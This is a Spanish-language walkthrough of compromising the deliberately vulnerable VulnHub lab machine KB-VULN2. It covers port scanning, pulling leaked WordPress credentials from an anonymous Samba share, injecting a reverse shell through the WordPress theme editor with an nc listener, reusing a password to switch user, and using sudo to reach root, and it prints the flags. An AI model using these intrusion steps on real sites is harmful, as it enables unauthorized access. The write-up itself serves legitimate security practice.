Hoy vamos a hackear la maquina de Vulnhub llamada KB-VULN2. Podeis descargarla desde el siguiente enlace: http://vulnhub.com/entry/kb-vuln-2,562/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~ > nmap -A -p- Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-28 11:45 CEST Nmap scan report for Host is up (0.0024s latency). Not shown: 65530 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 5e:99:01:23:fe:c4:84:ef:14:55:87:da:a3:30:6f:50 (RSA) | 256 cb:8e:e1:b3:3a:6e:64:9e:0f:53:39:7e:18:9d:8b:3f (ECDSA) |_ 256 ec:3b:d9:53:4a:5a:f7:32:f2:3a:f7:a7:6f:31:87:52 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP) Service Info: Host: UBUNTU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 0s, deviation: 1s, median: 0s |_nbstat: NetBIOS name: UBUNTU, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6-Ubuntu) | Computer name: kb-server | NetBIOS computer name: UBUNTU\x00 | Domain name: \x00 | FQDN: kb-server |_ System time: 2020-09-28T09:45:55+00:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-09-28 11:45:54 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.51 seconds
    Vemos que tiene el puerto de samba abierto, y tiene el directorio Anonymous, asi que nos conectamos.
    ~ > smbclient \\\\\\Anonymous mkdir failed on directory /var/run/samba/msg.lock: Permiso denegado Unable to initialize messaging context Enter WORKGROUP\sml's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Thu Sep 17 12:58:56 2020 .. D 0 Wed Sep 16 12:36:09 2020 backup.zip N 16735117 Thu Sep 17 12:58:56 2020 14380040 blocks of size 1024. 8497088 blocks available smb: \>
    Nos descargamos el fichero backup.zip.
    smb: \> get backup.zip getting file \backup.zip of size 16735117 as backup.zip (71995,1 KiloBytes/sec) (average 71995,1 KiloBytes/sec) smb: \>
    Lo extraemos.
    ~ > unzip backup.zip
    Vemos que extrae una carpeta "wordpress" y el fichero remember_me.txt. Si miramos el fichero vemos que contiene unos credenciales...
    ~ > cat remember_me.txt Username:admin Password:MachineBoy141
    Por otro lado, usamos gobuster para ver si encontramos algun directorio interesante.
    ~ > gobuster dir -u -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/09/28 11:55:37 Starting gobuster =============================================================== /.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /index.html (Status: 200) /server-status (Status: 403) /wordpress (Status: 301) =============================================================== 2020/09/28 11:55:39 Finished ===============================================================
    Encontramos el directorio "wordpress". Visitamos http://kb-vuln/wordpress/wp-admin y nos logueamos usando los credenciales que hemos encontrado anteriormente.
    Username:admin Password:MachineBoy141
    Vamos a Themes y activamos el theme Twenty seventeen. Appearance -> Activate seventeen. Una vez activado vamos a Theme Editor y editamos el fichero header.php para agregarle una una reverse shell. Ponemos nc a la escucha.
    ~ > nc -nlvp 1234 listening on [any] 1234 ...
    Y visitamos: kb.vuln/wordpress/
  • Low Shell
  • ~ > nc -nlvp 1234 listening on [any] 1234 ... connect to [] from (UNKNOWN) [] 40476 Linux kb-server 4.15.0-117-generic #118-Ubuntu SMP Fri Sep 4 20:02:41 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 10:09:56 up 24 min, 0 users, load average: 0.01, 0.02, 0.09 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $python3 -c 'import pty;pty.spawn("/bin/bash");'
  • user.txt
  • www-data@kb-server:/home/kbadmin$ ls note.txt user.txt www-data@kb-server:/home/kbadmin$ cat user.txt 03bf4d20dac5644c75e69e40bad48db0
    Exploramos el sistema y vemos que hay un usuario llamado kbadmin. Usamos la misma password que hemos usado para logarnos al wordpress pero esta vez para logarnos como el usuario kbadmin.
    www-data@kb-server:/home/kbadmin$ su kbadmin Password: MachineBoy141 kbadmin@kb-server:~$
  • Privile Escalation
  • Miramos si kbadmin puede usar sudo.
    kbadmin@kb-server:~$ sudo -l Matching Defaults entries for kbadmin on kb-server: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/ snap/bin User kbadmin may run the following commands on kb-server: (ALL : ALL) ALL
    Vemos que puede hacer todo con sudo :)
  • root.txt
  • kbadmin@kb-server:~$ sudo su root@kb-server:/home/kbadmin# cd ~ root@kb-server:~# ls flag.txt root@kb-server:~# cat flag.txt dc387b4cf1a4143f562dd1bdb3790ff1
  • End
  • Y con esto ya seriamos root de la maquina.